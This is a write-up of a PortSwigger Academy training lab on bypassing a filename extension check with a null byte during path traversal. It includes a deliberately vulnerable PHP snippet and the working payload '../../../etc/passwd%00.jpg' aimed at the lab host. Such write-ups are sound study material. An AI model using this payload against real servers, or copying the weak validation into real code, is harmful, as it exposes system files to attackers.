🌐 File path traversal, validation of file extension with null byte bypass
Detailed analysis of the lab 'File path traversal, validation of file extension with null byte bypass' from the PortSwigger Academy Path traversal series
This lab contains a path traversal vulnerability in the display of product images. The application validates that the supplied filename ends with the expected file extension. To solve the lab, retrieve the contents of the /etc/passwd file.
🔧 Lab Setup & Files
Files and Environment
1
Files:None
🔍 Initial Analysis
First Steps
This is the last lab in the Path Traversal series. It is recommended to always consult the first one for all clarifications: File path traversal, simple case. In this lab, the vulnerable parameter is still filename. The only thing that changes is that a filter is applied to check the file extension of the src attribute in the <img> tag that loads the resource. In fact, it is most likely checking if the file has a .jpg extension, as seen in the previous labs. If the extension is .jpg, it will load the resource; otherwise, it will respond with a Not Found. Let’s move on to the exploitation phase.
🔬 Vulnerability Analysis
Potential Attack Vectors
Path Traversal
🎯 Solution Path
Step-by-Step Guide
Initial setup
Given the title of the lab, the first question we can ask ourselves is: what is a null byte? A null byte, as the name suggests, is a null byte, i.e., set to zero (0x00). There is a known technique called Null Byte Injection which is used to generate unexpected behaviors in software, and it can also be applied to web servers, for example, in file uploads. Let’s start with the basics! In C/C++, the null byte is used as the string terminator character. This means that every string, even if not directly visible, ends with a \0. The reason for this choice is that, in C, a string is simply an array of char. Without a terminator character (\0) to check, it would not be possible to know the length of the string. Let’s pretend we have a code example in PHP like this:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
// Vulnerable example: file inclusion with weak extension validation
// Get the 'filename' parameter from the query string
if(!isset($_GET['filename'])){die("Please supply a filename parameter.");}$filename=$_GET['filename'];// Weak validation: check if the string ends with ".jpg"
if(substr($filename,-4)!=='.jpg'){die("Invalid file type.");}// Attempt to read the file
if(file_exists($filename)){echofile_get_contents($filename);}else{echo"File not found.";}?>
In this case, by sending a payload like file%00.jpg, we can bypass the extension check because the check verifies if the last 4 characters are .jpg, but by inserting %00, the string will terminate earlier in the execution of file_get_contents(), thus stopping at passwd, bypassing the check and constructing a valid payload for the path.
Exploitation
So, we just need to use the dot-dot-slash sequence as done in the other labs and finally add %00 to bypass the extension check, exactly like this: filename=../../../etc/passwd%00.jpg, forming the complete URL: https://0abf0099037a82ee80f6b381000a0014.web-security-academy.net/image?filename=../../../etc/passwd%00.jpg, we will get the passwd file:
Passwd
Solution Confirmation
Lab Solution
🛠️ Exploitation Process
Technical Approach
The automatic exploit makes a simple GET request by setting the parameter filename=../../../etc/passwd\x00.jpg. Why \x00 and not %00? As we discussed in previous labs, requests performs URL encoding when it detects special characters, so this payload wouldn’t work because the % would be encoded as %25, turning everything into %2500. Instead, in Python, to insert hexadecimal characters into a string, we use \xXX, which will be interpreted as a null byte, and when URL encoding is performed, it will be converted to %00, correctly returning the /etc/passwd file.